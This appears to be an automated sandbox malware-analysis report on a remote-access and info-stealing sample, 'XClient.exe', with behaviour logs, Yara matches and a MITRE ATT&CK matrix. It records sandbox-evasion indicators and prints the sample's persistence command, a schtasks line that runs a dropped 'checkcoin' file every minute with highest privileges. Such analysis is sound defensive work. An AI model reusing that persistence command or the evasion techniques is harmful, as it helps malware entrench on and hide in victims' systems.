                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\checkcoinProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile opened: \Device\RasAcd count: 73286Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeMemory allocated: 1B010000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\checkcoinMemory allocated: AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\checkcoinMemory allocated: 1A690000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\checkcoinMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\checkcoinMemory allocated: 1AF30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\checkcoinMemory allocated: 1470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\checkcoinMemory allocated: 1B560000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\checkcoinMemory allocated: BA0000 memory reserve | memory write watch
                  Source: C:\Users\user\checkcoinMemory allocated: 1A7C0000 memory reserve | memory write watch
                  Source: C:\Users\user\checkcoinMemory allocated: 760000 memory reserve | memory write watch
                  Source: C:\Users\user\checkcoinMemory allocated: 1A3D0000 memory reserve | memory write watch
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeWindow / User API: threadDelayed 2860Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeWindow / User API: threadDelayed 6060Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exe TID: 4724Thread sleep time: -2860000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exe TID: 4724Thread sleep time: -6060000s >= -30000sJump to behavior
                  Source: C:\Users\user\checkcoin TID: 5224Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\checkcoin TID: 5300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\checkcoin TID: 1252Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\checkcoin TID: 3552Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\checkcoin TID: 424Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\checkcoinFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\checkcoinFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\checkcoinFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\checkcoinFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\checkcoinFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\checkcoinThread delayed: delay time: 922337203685477
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C006000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}}3
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C006000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA+
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C006000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\checkcoinProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\checkcoinProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\checkcoinProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\checkcoinProcess token adjusted: Debug
                  Source: C:\Users\user\checkcoinProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "checkcoin" /tr "C:\Users\user\checkcoin"Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeQueries volume information: C:\Users\user\Desktop\XClient.exe.bin.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\checkcoinQueries volume information: C:\Users\user\checkcoin VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\checkcoinQueries volume information: C:\Users\user\checkcoin VolumeInformationJump to behavior
                  Source: C:\Users\user\checkcoinQueries volume information: C:\Users\user\checkcoin VolumeInformationJump to behavior
                  Source: C:\Users\user\checkcoinQueries volume information: C:\Users\user\checkcoin VolumeInformation
                  Source: C:\Users\user\checkcoinQueries volume information: C:\Users\user\checkcoin VolumeInformation
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: XClient.exe.bin.exe PID: 7084, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: XClient.exe.bin.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: XClient.exe.bin.exe PID: 7084, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\checkcoin, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: XClient.exe.bin.exe PID: 7084, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: XClient.exe.bin.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: XClient.exe.bin.exe PID: 7084, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\checkcoin, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation
                  1
                  Scheduled Task/Job
                  11
                  Process Injection
                  121
                  Masquerading
                  1
                  Input Capture
                  21
                  Security Software Discovery
                  Remote Services1
                  Input Capture
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  21
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  1
                  Disable or Modify Tools
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading
                  21
                  Registry Run Keys / Startup Folder
                  231
                  Virtualization/Sandbox Evasion
                  Security Account Manager231
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares1
                  Clipboard Data
                  3
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading
                  11
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeylogging14
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Obfuscated Files or Information
                  Cached Domain Credentials13
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Software Packing
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.